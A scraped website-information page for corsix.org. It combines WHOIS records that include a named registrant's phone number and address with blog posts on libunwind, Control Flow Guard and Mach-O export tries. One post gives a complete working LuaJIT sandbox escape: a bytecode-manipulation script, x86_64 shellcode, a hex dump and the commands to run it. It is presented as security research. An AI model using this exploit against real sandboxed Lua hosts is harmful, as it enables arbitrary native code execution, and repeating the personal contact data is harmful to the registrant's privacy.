corsix.org Estimated Worth $436,312 - MYIP.NET Website Information
Whois data

Who is corsix.org at org.whois-servers.net

Domain Name: CORSIX.ORG

Domain ID: D124748511-LROR

WHOIS Server:

Referral URL: http://www.godaddy.com

Updated Date: 2016-06-19T10:44:00Z

Creation Date: 2006-06-18T10:44:59Z

Registry Expiry Date: 2020-06-18T10:44:59Z

Sponsoring Registrar: GoDaddy.com, LLC

Sponsoring Registrar IANA ID: 146

Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited

Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited

Registrant ID: CR13392603

Registrant Name: Peter Cawley

Registrant Organization:

Registrant Street: XTX Markets

Registrant Street: Leconfield House, Curzon Street

Registrant City: London

Registrant State/Province:

Registrant Postal Code: W1J 5JA

Registrant Country: GB

Registrant Phone: +44.7854982956

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: corsix

Admin ID: CR13392612

Admin Name: Peter Cawley

Admin Organization:

Admin Street: XTX Markets

Admin Street: Leconfield House, Curzon Street

Admin City: London

Admin State/Province:

Admin Postal Code: W1J 5JA

Admin Country: GB

Admin Phone: +44.7854982956

Admin Phone Ext:

Admin Fax:

Admin Fax Ext:

Admin Email: corsix

Tech ID: CR13392611

Tech Name: Peter Cawley

Tech Organization:

Tech Street: XTX Markets

Tech Street: Leconfield House, Curzon Street

Tech City: London

Tech State/Province:

Tech Postal Code: W1J 5JA

Tech Country: GB

Tech Phone: +44.7854982956

Tech Phone Ext:

Tech Fax:

Tech Fax Ext:

Tech Email: corsix

Name Server: woz.ns.cloudflare.com

Name Server: rosa.ns.cloudflare.com

DNSSEC: unsigned

>>> Last update of WHOIS database: 2016-10-20T23:17:19Z <<<



For more information on Whois status codes, please visit https://icann.org/epp



Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.


Search Engine Spider Emulation

Title:corsix.org
Description:
Keywords:PyObject *, PyObject *, PyObject *);
Body:
corsix.org
corsix.org - a blog
On libunwind and dynamically generated code on x86-64
Posted on January 7, 2016
libunwind is a - supposedly portable - library for performing native stack unwinding. In simple scenarios, the library does its job fairly well; however, things get more interesting in the presence of dynamically-generated (vis-à-vis JIT-compiled) code. In fact, on any platform, and in any context, unwinding native stacks in the presence of dynamically-generated code is an interesting topic. It so happens that the Windows API gets this right, presenting you with two different options, either of which is sufficient on its own:
Construct some RUNTIME_FUNCTION data structures up front, and then call RtlAddFunctionTable.
Call RtlInstallFunctionTableCallback, and then construct RUNTIME_FUNCTION data structures lazily on demand (this is exactly the interface that a JIT compiler would want, and perhaps it was designed with one in mind).
I feel that Linux doesn't really get this right. Rather than there being a single OS-supplied interface, every tool has its own way of doing things:
libunwind: Construct ELF .debug_frame data structures, and table_entry data structures, and a unw_dyn_table_info data structure, and a unw_dyn_info_t structure, then call _U_dyn_register.
C++ exception unwinder: Construct ELF .eh_frame data structures, then call __register_frame (I'd like to link to some documentation on __register_frame, but Google doesn't immediately find anything, so I assume that there isn't any).
GDB: Construct a full in-memory ELF object, manually maintain a doubly-linked list of all such objects in a global variable called __jit_debug_descriptor, and call a global function called __jit_debug_register_code when this list is changed (though it seems baroque, this is documented quite well).
All three of these interfaces require data structures to be generated up-front, which isn't ideal for JIT compilers, but I digress (though possibly in some cases, creative use of PROT_NONE pages and SIGSEGV handlers could allow some degree of lazy on-demand generation). That all three interfaces consume different data is annoying. That .eh_frame and .debug_frame are subtly different is also annoying, but I digress again.
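As a rough illustration of the GDB interface from the list above, here is a minimal sketch in C of the bookkeeping it asks for. The struct layouts and the two __jit_debug_* symbol names follow GDB's documented JIT interface; the helpers jit_register_object and jit_unregister_object are hypothetical names chosen for this sketch, and generating the in-memory ELF object itself is not shown.

```c
#include <stddef.h>
#include <stdint.h>

typedef enum { JIT_NOACTION = 0, JIT_REGISTER_FN, JIT_UNREGISTER_FN } jit_actions_t;

/* One node per in-memory ELF object, as laid out in the GDB documentation. */
struct jit_code_entry {
    struct jit_code_entry *next_entry;
    struct jit_code_entry *prev_entry;
    const char *symfile_addr;
    uint64_t symfile_size;
};

struct jit_descriptor {
    uint32_t version;
    uint32_t action_flag; /* a jit_actions_t value */
    struct jit_code_entry *relevant_entry;
    struct jit_code_entry *first_entry;
};

/* GDB places a breakpoint on this function, so it must not be inlined away. */
void __attribute__((noinline)) __jit_debug_register_code(void) { __asm__ volatile(""); }

/* The version field must be 1. */
struct jit_descriptor __jit_debug_descriptor = { 1, JIT_NOACTION, NULL, NULL };

/* Hypothetical helper: push an entry onto the front of the list and notify GDB. */
void jit_register_object(struct jit_code_entry *entry, const char *elf, uint64_t size)
{
    entry->symfile_addr = elf;
    entry->symfile_size = size;
    entry->prev_entry = NULL;
    entry->next_entry = __jit_debug_descriptor.first_entry;
    if (entry->next_entry)
        entry->next_entry->prev_entry = entry;
    __jit_debug_descriptor.first_entry = entry;
    __jit_debug_descriptor.relevant_entry = entry;
    __jit_debug_descriptor.action_flag = JIT_REGISTER_FN;
    __jit_debug_register_code();
}

/* Hypothetical helper: unlink an entry from the list and notify GDB. */
void jit_unregister_object(struct jit_code_entry *entry)
{
    if (entry->prev_entry)
        entry->prev_entry->next_entry = entry->next_entry;
    else
        __jit_debug_descriptor.first_entry = entry->next_entry;
    if (entry->next_entry)
        entry->next_entry->prev_entry = entry->prev_entry;
    __jit_debug_descriptor.relevant_entry = entry;
    __jit_debug_descriptor.action_flag = JIT_UNREGISTER_FN;
    __jit_debug_register_code();
}
```

Every change to the list goes through the same pattern: update the links, set relevant_entry and action_flag, then call __jit_debug_register_code so that an attached debugger gets a chance to look at the descriptor.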
Though libunwind presents an interface, it happens to be poorly documented and poorly implemented for x86-64. In particular, if you read the documentation, then you'd be left with the impression that unw_dyn_info_t can refer to either a unw_dyn_proc_info_t structure (UNW_INFO_FORMAT_DYNAMIC), or a unw_dyn_table_info structure (UNW_INFO_FORMAT_REMOTE_TABLE or UNW_INFO_FORMAT_TABLE). On the former structure, the documentation has the following to say:
This is the preferred dynamic unwind-info format and it is generally the one used by full-blown runtime code-generators. In this format, the details of a procedure are described by a structure of type unw_dyn_proc_info_t.
Let me save you some time by pointing out that unwind directives for unw_dyn_proc_info_t structures plain aren't implemented on x86-64. As such, using unw_dyn_proc_info_t is a non-starter if you actually want to do any unwinding. Consequently, the only option is to use unw_dyn_table_info. The most interesting field of unw_dyn_table_info is table_data, the documentation for which states:
A pointer to the actual data encoding the unwind-info. The exact format is architecture-specific (see architecture-specific sections below).
Of course, there are no such notes below with reference to x86-64. Let me save you some time by pointing out that the table_data field should refer to an array of table_entry structures (which aren't documented, or present in any header, but can be found in the source). In turn, the fde_offset field of that structure should refer to a DWARF FDE in .debug_frame style.
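To make the shape of that table a little more concrete, here is a minimal sketch in C. The two-field layout is an assumption based on the private definition in the libunwind source (only fde_offset is named in the text above), so check it against the version you are building against. find_entry is a hypothetical helper showing the kind of sorted lookup such a table supports; it is not libunwind's own code.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed layout, mirroring the private struct in the libunwind source. */
struct table_entry {
    int32_t start_ip_offset; /* start of the function, relative to a segment base */
    int32_t fde_offset;      /* where to find the FDE describing that function */
};

/* Hypothetical helper: return the last entry whose start_ip_offset is <= rel_ip,
   or NULL if rel_ip lies before every entry. The table must be sorted by
   start_ip_offset in ascending order. */
static const struct table_entry *
find_entry(const struct table_entry *table, size_t count, int32_t rel_ip)
{
    size_t lo = 0, hi = count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (table[mid].start_ip_offset <= rel_ip)
            lo = mid + 1;
        else
            hi = mid;
    }
    return lo == 0 ? NULL : &table[lo - 1];
}
```

A JIT compiler would append one such entry per generated function, keep the array sorted, and emit a matching .debug_frame style FDE at the location each fde_offset refers to.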
After supplying unwind information via UNW_INFO_FORMAT_TABLE, libunwind is capable of unwinding over call frames for dynamically-generated code on x86-64. After getting basic unwinding working, one might like to make libunwind supply a useful function name for the call frame. The unw_dyn_table_info structure contains a name_ptr field which looks perfect for this task, but the code which should read this field instead just returns UNW_ENOINFO for UNW_INFO_FORMAT_TABLE (or, it would, but UNW_EINVAL is also likely, as the enclosing switch statement should be on pi.format rather than di->format). The observant reader will spot that this name-related logic is fully implemented for UNW_INFO_FORMAT_DYNAMIC, leaving us in a sad situation on x86-64: use UNW_INFO_FORMAT_DYNAMIC and get names but no unwinding, or use UNW_INFO_FORMAT_TABLE and get unwinding but no names.
I'd like to finish on a positive note instead of that sad note, but alas, this is a tale of woe.
Malicious LuaJIT bytecode
Posted on November 11, 2015
I have previously written about how malicious bytecode can be used to escape from a Lua 5.1 sandbox on 32-bit Windows, and other people have applied the same methods to attack redis instances.
It should come as no surprise that LuaJIT (as opposed to plain PUC-Rio non-JIT Lua) also has bytecode which can be used to escape from sandboxes, but it is nevertheless illustrative to work through the details of a full sandbox escape. The conclusion, as should be accepted knowledge by now, is that Lua should be sandboxed at the operating-system-process level, as opposed to at the Lua level.
For the purposes of this exercise, we'll escape from the following sandbox:
#include <lauxlib.h>
#include <lualib.h>
int main() {
  lua_State* L = luaL_newstate();
  lua_cpcall(L, luaopen_jit, NULL);
  luaL_dofile(L, "evil.lua");
  lua_close(L);
}
The sandbox executes arbitrary Lua code of our choice (the evil.lua file), and our aim is to escalate up to executing arbitrary native code of our choice. If the sandbox exposed LuaJIT's standard ffi library, then this would be trivial: call ffi.cdef to declare a prototype for mprotect (or VirtualProtect on Windows), call mprotect on some shellcode to make it executable, call ffi.cast to get a function pointer for the shellcode, and then call the function pointer. Of course, the sandbox does not expose the ffi library - nor does it expose the base library (hence no tostring or print or etc.) or the package library (no require) or the string library (no string manipulation) or any other useful library. As its sole concession, the sandbox does load the jit library, as this library must be loaded in order for LuaJIT to actually do JIT compilation.
The particular environment we'll attack is LuaJIT commit 4f87367b (head of the v2.1 branch at time of writing), running on an x86_64 flavour of either Mac OSX or Linux, and compiled with LJ_64=1 and LJ_GC64=0 and LJ_FR2=0 (these being the current defaults for LuaJIT on x86_64).
The evil.lua file that we'll end up using will contain LuaJIT bytecode rather than Lua source code. Writing bytecode by hand is somewhat arduous, so instead we'll write Lua source code, compile it to bytecode, and then make a few surgical tweaks to the bytecode. The following rather long block of code contains both the Lua source code to be compiled and manipulated, and the Lua source code for performing the compilation and manipulation.
-- The following function serves as the template for evil.lua.
-- The general outline is to compile this function as-written, dump
-- it to bytecode, manipulate the bytecode a bit, and then save the
-- result as evil.lua.
local evil = function(v)
  -- This is the x86_64 native code which we'll execute. It
  -- is a very benign payload which just prints "Hello World"
  -- and then fixes up some broken state.
  local shellcode =
    "\76\139\87\16"..        -- mov r10, [rdi+16]
    "\184\4\0\0\2"..         -- mov eax, 0x2000004
    "\191\1\0\0\0"..         -- mov edi, 1
    "\72\141\53\51\0\0\0"..  -- lea rsi, [->msg]
    "\186\12\0\0\0"..        -- mov edx, 12
    "\15\5"..                -- syscall
    "\72\133\192"..          -- test rax, rax
    "\184\74\0\0\2"..        -- mov eax, 0x200004a
    "\121\12"..              -- jns ->is_osx
    "\184\1\0\0\0"..         -- mov eax, 1
    "\15\5"..                -- syscall
    "\184\10\0\0\0"..        -- mov eax, 10
                             -- ->is_osx:
    "\73\139\58"..           -- mov rdi, [r10]
    "\72\139\119\8"..        -- mov rsi, [rdi+8]
    "\186\7\0\0\0"..         -- mov edx, 7
    "\15\5"..                -- syscall
    "\73\139\114\8"..        -- mov rsi, [r10+8]
    "\72\137\55"..           -- mov [rdi], rsi
    "\195"..                 -- ret
                             -- ->msg:
    "Hello World\n"
  -- The dirty work is done by the following "inner" function.
  -- This inner function exists because we require a vararg call
  -- frame on the Lua stack, and for the function associated with
  -- said frame to have certain special upvalues.
  local function inner(...)
    if false then
      -- The following three lines turn into three bytecode
      -- instructions. We munge the bytecode slightly, and then
      -- later reinterpret the instructions as a cdata object,
      -- which will end up being `cdata<const char *>: NULL`.
      -- The `if false` wrapper ensures that the munged bytecode
      -- isn't executed.
      local cdata = -32749
      cdata = 0
      cdata = 0
    end
    -- Through the power of bytecode manipulation, the
    -- following three functions will become (the fast paths of)
    -- string.byte, string.char, and string.sub. This is
    -- possible because LuaJIT has bytecode instructions
    -- corresponding to the fast paths of said functions. Note
    -- that we mustn't stray from the fast path (because the
    -- fallback C code won't be wired up). Also note that the
    -- interpreter state will be slightly messed up after
    -- calling one of these functions.
    local function s_byte(s) end
    local function s_char(i, _) end
    local function s_sub(s, i, j) end
    -- The following function does nothing, but calling it will
    -- restore the interpreter state which was messed up following
    -- a call to one of the previous three functions. Because this
    -- function contains a cdata literal, loading it from bytecode
    -- will result in the ffi library being initialised (but not
    -- registered in the global namespace).
    local function resync() return 0LL end
    -- Helper function to reinterpret the first four bytes of a
    -- string as a uint32_t, and return said value as a number.
    local function s_uint32(s)
      local result = 0
      for i = 4, 1, -1 do
        result = result * 256 + s_byte(s_sub(s, i, i))
        resync()
      end
      return result
    end
    -- The following line obtains the address of the GCfuncL
    -- object corresponding to "inner". As written, it just fetches
    -- the 0th upvalue, and does some arithmetic. After some
    -- bytecode manipulation, the 0th upvalue ends up pointing
    -- somewhere very interesting: the frame info TValue containing
    -- func|FRAME_VARG|delta. Because delta is small, this TValue
    -- will end up being a denormalised number, from which we can
    -- easily pull out 32 bits to give us the "func" part.
    local iaddr = (inner * 2^1022 * 2^52) % 2^32
    -- The following five lines read the "pc" field of the GCfuncL
    -- we just obtained. This is done by creating a GCstr object
    -- overlaying the GCfuncL, and then pulling some bytes out of
    -- the string. Bytecode manipulation results in a nice KPRI
    -- instruction which preserves the low 32 bits of the istr
    -- TValue while changing the high 32 bits to specify that the
    -- low 32 bits contain a GCstr*.
    local istr = (iaddr - 4) + 2^52
    istr = -32764 -- Turned into KPRI(str)
    local pc = s_sub(istr, 5, 8)
    istr = resync()
    pc = s_uint32(pc)
    -- The following three lines result in the local variable
    -- called "memory" being `cdata<const char *>: NULL`. We can
    -- subsequently use this variable to read arbitrary memory
    -- (one byte at a time). Note again the KPRI trick to change
    -- the high 32 bits of a TValue. In this case, the low 32 bits
    -- end up pointing to the bytecode instructions at the top of
    -- this function wrapped in `if false`.
    local memory = (pc + 8) + 2^52
    memory = -32758 -- Turned into KPRI(cdata)
    memory = memory + 0
    -- Helper function to read a uint32_t from any memory location.
    local function m_uint32(offs)
      local result = 0
      for i = offs + 3, offs, -1 do
        result = result * 256 + (memory[i] % 256)
      end
      return result
    end
    -- Helper function to extract the low 32 bits of a TValue.
    -- In particular, for TValues containing a GCobj*, this gives
    -- the GCobj* as a uint32_t. Note that the two memory reads
    -- here are GCfuncL::uvptr[1] and GCupval::v.
    local vaddr = m_uint32(m_uint32(iaddr + 24) + 16)
    local function low32(tv)
      v = tv
      return m_uint32(vaddr)
    end
    -- Helper function which is the inverse of s_uint32: given a
    -- 32 bit number, returns a four byte string.
    local function ub4(n)
      local result = ""
      for i = 0, 3 do
        local b = n % 256
        n = (n - b) / 256
        result = result .. s_char(b)
        resync()
      end
      return result
    end
    -- The following four lines result in the local variable
    -- called "mctab" containing a very special table: the
    -- array part of the table points to the current Lua
    -- universe's jit_State::patchins field. Consequently,
    -- the table's [0] through [4] fields allow access to the
    -- mcprot, mcarea, mctop, mcbot, and szmcarea fields of
    -- the jit_State. Note that LuaJIT allocates the empty
    -- string within global_State, so a fixed offset from the
    -- address of the empty string gives the fields we're
    -- after within jit_State.
    local mctab_s = "\0\0\0\0\99\4\0\0".. ub4(low32("") + 2748)
      .."\0\0\0\0\0\0\0\0\0\0\0\0\5\0\0\0\255\255\255\255"
    local mctab = low32(mctab_s) + 16 + 2^52
    mctab = -32757 -- Turned into KPRI(table)
    -- Construct a string consisting of 4096 x86 NOP instructions.
    local nop4k = "\144"
    for i = 1, 12 do nop4k = nop4k .. nop4k end
    -- Create a copy of the shellcode which is page aligned, and
    -- at least one page big, and obtain its address in "asaddr".
    local ashellcode = nop4k .. shellcode .. nop4k
    local asaddr = low32(ashellcode) + 16
    asaddr = asaddr + 2^12 - (asaddr % 2^12)
    -- The following seven lines result in the memory protection of
    -- the page at asaddr changing from read/write to read/execute.
    -- This is done by setting the jit_State::mcarea and szmcarea
    -- fields to specify the page in question, setting the mctop and
    -- mcbot fields to an empty subrange of said page, and then
    -- triggering some JIT compilation. As a somewhat unfortunate
    -- side-effect, the page at asaddr is added to the jit_State's
    -- linked-list of mcode areas (the shellcode unlinks it).
    local mcarea = mctab[1]
    mctab[0] = 0
    mctab[1] = asaddr / 2^52 / 2^1022
    mctab[2] = mctab[1]
    mctab[3] = mctab[1]
    mctab[4] = 2^12 / 2^52 / 2^1022
    while mctab[0] == 0 do end
    -- The following three lines construct a GCfuncC object
    -- whose lua_CFunction field is set to asaddr. A fixed
    -- offset from the address of the empty string gives us
    -- the global_State::bc_cfunc_int field.
    local fshellcode = ub4(low32("") + 132) .."\0\0\0\0"..
                       ub4(asaddr) .."\0\0\0\0"
    fshellcode = -32760 -- Turned into KPRI(func)
    -- Finally, we invoke the shellcode (and pass it some values
    -- which allow it to remove the page at asaddr from the list
    -- of mcode areas).
    fshellcode(mctab[1], mcarea)
  end
  inner()
end
-- Some helpers for manipulating bytecode:
local ffi = require "ffi"
local bit = require "bit"
local BC = {KSHORT = 41, KPRI = 43}
-- Dump the as-written evil function to bytecode:
local estr = string.dump(evil, true)
local buf = ffi.new("uint8_t[?]", #estr+1, estr)
local p = buf + 5
-- Helper function to read a ULEB128 from p:
local function read_uleb128()
  local v = p[0]; p = p + 1
  if v >= 128 then
    local sh = 7; v = v - 128
    repeat
      local r = p[0]
      v = v + bit.lshift(bit.band(r, 127), sh)
      sh = sh + 7
      p = p + 1
    until r < 128
  end
  return v
end
-- The dumped bytecode contains several prototypes: one for "evil"
-- itself, and one for every (transitive) inner function. We step
-- through each prototype in turn, and tweak some of them.
while true do
  local len = read_uleb128()
  if len == 0 then break end
  local pend = p + len
  local flags, numparams, framesize, sizeuv = p[0], p[1], p[2], p[3]
  p = p + 4
  read_uleb128()
  read_uleb128()
  local sizebc = read_uleb128()
  local bc = p
  local uv = ffi.cast("uint16_t*", p + sizebc * 4)
  if numparams == 0 and sizeuv == 3 then
    -- This branch picks out the "inner" function.
    -- The first thing we do is change what the 0th upvalue
    -- points at:
    uv[0] = uv[0] + 2
    -- Then we go through and change everything which was written
    -- as "local_variable = -327XX" in the source to instead be
    -- a KPRI instruction:
    for i = 0, sizebc do
      if bc[0] == BC.KSHORT then
        local rd = ffi.cast("int16_t*", bc)[1]
        if rd <= -32749 then
          bc[0] = BC.KPRI
          bc[3] = 0
          if rd == -32749 then
            -- the `cdata = -32749` line in source also tweaks
            -- the two instructions after it:
            bc[4] = 0
            bc[8] = 0
          end
        end
      end
      bc = bc + 4
    end
  elseif sizebc == 1 then
    -- As written, the s_byte, s_char, and s_sub functions each
    -- contain a single "return" instruction. We replace said
    -- instruction with the corresponding fast-function instruction.
    bc[0] = 147 + numparams
    bc[2] = bit.band(1 + numparams, 6)
span class="hljs-keyword"endspan
p = pend
span class="hljs-keyword"endspan
span class="hljs-comment"-- Finally, save the manipulated bytecode as evil.lua:span
span class="hljs-keyword"localspan f = span class="hljs-built_in"iospan.open(span class="hljs-string""evil.lua"span, span class="hljs-string""wb"span)
f:write(ffi.span class="hljs-built_in"stringspan(buf, #estr))
f:close()
If we save the above as make_evil.lua, then we can execute it to create evil.lua:
$ luajit make_evil.lua
$ file evil.lua
evil.lua: data
$ xxd evil.lua
0000000: 1b4c 4a02 060b 0001 0100 0000 0194 0002 .LJ.............
0000010: 000b 0002 0200 0000 0195 0002 000b 0003 ................
0000020: 0300 0000 0196 0004 0012 0400 0100 0100 ................
0000030: 0228 0000 004c 0002 0002 0000 5700 010c .(...L......W...
0000040: 0300 0112 2901 0000 2902 0400 2903 0100 ....)...)...)...
0000050: 2904 ffff 4d02 0c80 1806 0001 2d07 0000 )...M.......-...
0000060: 2d08 0100 1209 0000 120a 0500 120b 0500 -...............
0000070: 4208 0400 4107 0002 2001 0706 2d06 0200 B...A... ...-...
0000080: 4206 0101 4f02 f47f 4c01 0200 00c0 02c0 B...O...L.......
0000090: 03c0 8004 3c00 0108 0100 020c 2901 0000 ....<.......)...
00000a0: 1602 0000 1203 0000 2904 ffff 4d02 0680 ........)...M...
00000b0: 1806 0101 2d07 0000 3807 0507 1a07 0107 ....-...8.......
00000c0: 2001 0706 4f02 fa7f 4c01 0200 0880 0680 ...O...L.......
00000d0: 041d 0001 0303 0000 042e 0000 002d 0101 .............-..
00000e0: 002d 0202 0044 0102 0001 0009 c00a c052 .-...D.........R
00000f0: 0001 0a02 0101 1127 0100 0029 0200 0029 .......'...)...)
0000100: 0303 0029 0401 004d 020b 801a 0600 0021 ...)...M.......!
0000110: 0706 0019 0000 0712 0701 002d 0800 0012 ...........-....
0000120: 0906 0042 0802 0226 0108 072d 0701 0042 ...B...&...-...B
0000130: 0701 014f 02f5 7f4c 0102 0001 c003 c005 ...O...L........
0000140: 8004 9f04 0700 1703 0d0c 7158 0000 8058 ..........qX...X
0000150: 0003 802b 0013 0000 0000 0000 0000 0033 ...+...........3
0000160: 0000 0033 0101 0033 0202 0033 0303 0033 ...3...3...3...3
0000170: 0404 002d 0500 0018 0500 0518 0501 051a ...-............
0000180: 0502 0517 0603 0516 0601 062b 0604 0012 ...........+....
0000190: 0702 0012 0806 0029 0905 0029 0a08 0042 .......)...)...B
00001a0: 0704 0212 0803 0042 0801 0212 0608 0012 .......B........
00001b0: 0804 0012 0907 0042 0802 0212 0708 0016 .......B........
00001c0: 0804 0716 0801 082b 080a 0016 0805 0833 .......+.......3
00001d0: 0905 0012 0a09 0012 0b09 0016 0c06 0542 ...............B
00001e0: 0b02 0216 0b07 0b42 0a02 0233 0b06 0033 .......B...3...3
00001f0: 0c07 0027 0d08 0012 0e0c 0012 0f0b 0027 ...'...........'
0000200: 1009 0042 0f02 0216 0f08 0f42 0e02 0227 ...B.......B...'
0000210: 0f0a 0026 0d0f 0d12 0e0b 0012 0f0d 0042 ...&...........B
0000220: 0e02 0216 0e07 0e16 0e01 0e2b 0e0b 0027 ...........+...'
0000230: 0f0b 0029 1001 0029 110c 0029 1201 004d ...)...)...)...M
0000240: 1004 8012 140f 0012 150f 0026 0f15 144f ...........&...O
0000250: 10fc 7f12 100f 002d 1102 0012 120f 0026 .......-.......&
0000260: 1012 1012 110b 0012 1210 0042 1102 0216 ...........B....
0000270: 1107 1116 1209 111a 1309 1121 1113 123a ...........!...:
0000280: 1201 0e29 1300 003e 1300 0e19 1301 1119 ...)...>........
0000290: 1300 133e 1301 0e3a 1301 0e3e 1302 0e3a ...>...:...>...:
00002a0: 1301 0e3e 1303 0e2a 130a 003e 1304 0e3a ...>...*...>...:
00002b0: 1300 0e09 1305 0058 1302 8055 1301 8058 .......X...U...X
00002c0: 13fb 7f12 130c 0012 140b 0027 1509 0042 ...........'...B
00002d0: 1402 0216 140b 1442 1302 0227 140c 0012 .......B...'....
00002e0: 150c 0012 1611 0042 1502 0227 160c 0026 .......B...'...&
00002f0: 1316 132b 1308 0012 1413 003a 1501 0e12 ...+.......:....
0000300: 1612 0042 1403 0132 0000 804b 0001 0004 ...B...2...K....
0000310: c000 8001 c009 0000 0000 0690 1900 0000 ................
0000320: 0000 0000 0000 0000 0005 0000 00ff ffff ................
0000330: ff05 0d00 0000 0063 0400 0000 0000 0000 .......c........
0000340: 0000 0001 8080 c0fe 0701 8080 c099 0401 ................
0000350: 8080 c08f 0408 1000 3020 f82a 8040 8140 ........0 .*.@.@
0000360: 0088 02d2 0105 0115 0013 001a 2701 0000 ............'...
0000370: 2702 0100 2703 0200 2704 0300 2705 0400 '...'...'...'...
0000380: 2706 0500 2707 0600 2708 0700 2709 0800 '...'...'...'...
0000390: 270a 0900 270b 0500 270c 0a00 270d 0b00 '...'...'...'...
00003a0: 270e 0c00 270f 0d00 2710 0500 2711 0e00 '...'...'...'...
00003b0: 2712 0f00 2713 1000 2714 1100 2601 1401 '...'...'...&...
00003c0: 3302 1200 1203 0200 4203 0101 3200 0080 3.......B...2...
00003d0: 4b00 0100 0011 4865 6c6c 6f20 576f 726c K.....Hello Worl
00003e0: 640a 06c3 0848 8937 0949 8b72 080a ba07 d....H.7.I.r....
00003f0: 0000 0009 488b 7708 0849 8b3a 0ab8 0a00 ....H.w..I.:....
0000400: 0000 0ab8 0100 0000 0779 0c0a b84a 0000 .........y...J..
0000410: 0208 4885 c007 0f05 0aba 0c00 0000 0c48 ..H............H
0000420: 8d35 3300 0000 0abf 0100 0000 0ab8 0400 .53.............
0000430: 0002 094c 8b57 1000 ...L.W..
We can then run evil.lua either in our sandbox, or in luajit proper. Let's start with the latter:
$ luajit evil.lua
Hello World
Running evil.lua in our sandbox first requires that we compile and build the sandbox. Ensuring that you link against the correct version of LuaJIT can be fiddly, as can forcing the correct address space layout on OSX. Once your environment is set up correctly, this can be as simple as:
$ gcc sandbox.c -lluajit   # On OSX, also pass:
                           # -pagezero_size 10000
                           # -image_base 100000000
$ ./a.out
Hello World
With that, we've seen that malicious LuaJIT bytecode can be used to escape from the tightest of Lua-level sandboxes, and result in arbitrary native code execution.
Control flow guard
Posted on November 4, 2015
Microsoft recently introduced a new security feature called Control Flow Guard. At a basic level, this feature consists of a massive bit vector, and before any indirect function call is performed, the bit vector is consulted to determine whether the target of the call is valid or not. The end-goal is that the bit vector should specify all function entry addresses as valid, and all other addresses as invalid - thereby preventing malicious calls into the middle of functions. The structure of the bit vector is interesting, but most literature seems to get it wrong. For example, the Trend Micro report on Control Flow Guard states:
The status of every 8 bytes in the process space corresponds to a bit in CFGBitmap. If there is a function starting address in each group of 8 bytes, the corresponding bit in CFGBitmap is set to 1; otherwise it is set to 0.
Every bit in the CFGBitmap represents eight bytes in the process space. So if an invalid target call address has less than eight bytes from the valid function address, the CFG will think the target call address is "valid."
Meanwhile, a POC2014 conference talk states:
One bit indicates 8bytes address and actually in most cases 16bytes
Every guard function address needs to be aligned to 0x10
If function address is not aligned to 0x10, it will use the odd bit only
In the bit vector (which Trend Micro calls CFGBitmap), every two bits correspond to sixteen bytes. Therefore, on average, every bit corresponds to eight bytes. However, the average is very misleading here, as in reality one of those two bits corresponds to one byte, and the other bit corresponds to fifteen bytes. This arrangement has several benefits:
On average, only one bit is required for every eight bytes.
If functions are aligned to sixteen byte boundaries (as is common), then the bit vector can perfectly and exactly represent the set of valid function entry addresses (by marking just the one byte as valid).
If functions aren't aligned to sixteen byte boundaries, then the bit vector still has some benefit.
Computing the bit index corresponding to an address remains relatively fast (do some bit shifting, then conditionally do | 1 if the address isn't 8 byte aligned).
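The index computation in the last point can be sketched in a few lines. This is only an illustration of the layout described above, not code taken from Windows; the function name `cfg_bit_index` and the sample base address are made up for the example.

```python
def cfg_bit_index(address: int) -> int:
    """Map an address to its bit index in the bit vector (illustrative only)."""
    index = address >> 3      # one bit per eight bytes on average
    if address & 7:           # not 8-byte aligned: force the odd bit
        index |= 1
    return index

# Within one 16-byte group, the even bit covers exactly one address
# (the 16-byte-aligned one) and the odd bit covers the other fifteen.
base = 0x1000                 # arbitrary 16-byte-aligned sample address
group = [cfg_bit_index(base + offset) for offset in range(16)]
even_bit = cfg_bit_index(base)
odd_bit = even_bit + 1
print(group.count(even_bit), group.count(odd_bit))  # prints: 1 15
```

Addresses that are 8 modulo 16 already have an odd index after the shift, which is why testing the low three bits is enough to send every unaligned address in the group to the odd bit.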
Exporting an infinite number of symbols
Posted on June 27, 2015
Dynamically loadable shared libraries typically come in one of a few formats:
As Mach-O files with the .dylib extension on OSX.
As ELF files with the .so extension on Linux.
As PE files with the .dll extension on Windows.
The whole point of dynamically loadable shared libraries is to export symbols,
and these formats typically store exported symbol information as a list of
exported symbols or a hash table of exported symbols. One nice property of
lists and hash tables is that they're finite by default: unless you deliberately
try to make them infinite, they'll be finite.
One oddity of the Mach-O format is that exported symbol information can be
represented as a trie. The term trie is meant to allude to tree, and trees
are also finite by default. However, a trie can also be thought of as a
directed rooted graph, and if that graph were to have a cycle, then the number
of paths in the graph would be infinite.
Let us begin with a file called finite.c:
void corsix() {}
void corsix_() {}
#define C2(x) void corsix_##x() {}
#define C1(x) C2(x##a) C2(x##b) C2(x##c) C2(x##d) C2(x##e)
#define C0(x) C1(x##a) C1(x##b) C1(x##c) C1(x##d) C1(x##e)
C0(a) C0(b) C0(c) C0(d) C0(e)
We can compile this to a shared library like so:
$ clang finite.c -shared -o finite.dylib
This gives us a shared library called finite.dylib which exports
127 symbols: corsix, corsix_, and the 125 symbols matching the
regex corsix_[a-e][a-e][a-e]. These symbols aren't overly interesting,
and the sheer number of symbols is merely to ensure that the exported
symbol trie in finite.dylib occupies sufficiently many bytes.
The exported symbol trie in finite.dylib looks something like the
following diagram:
                                         +-"a"-> corsix_a ...
                                         |
                                         +-"b"-> corsix_b ...
                                         |
root -"_corsix"-> corsix -"_"-> corsix_ -+-"c"-> corsix_c ...
                                         |
                                         +-"d"-> corsix_d ...
                                         |
                                         +-"e"-> corsix_e ...
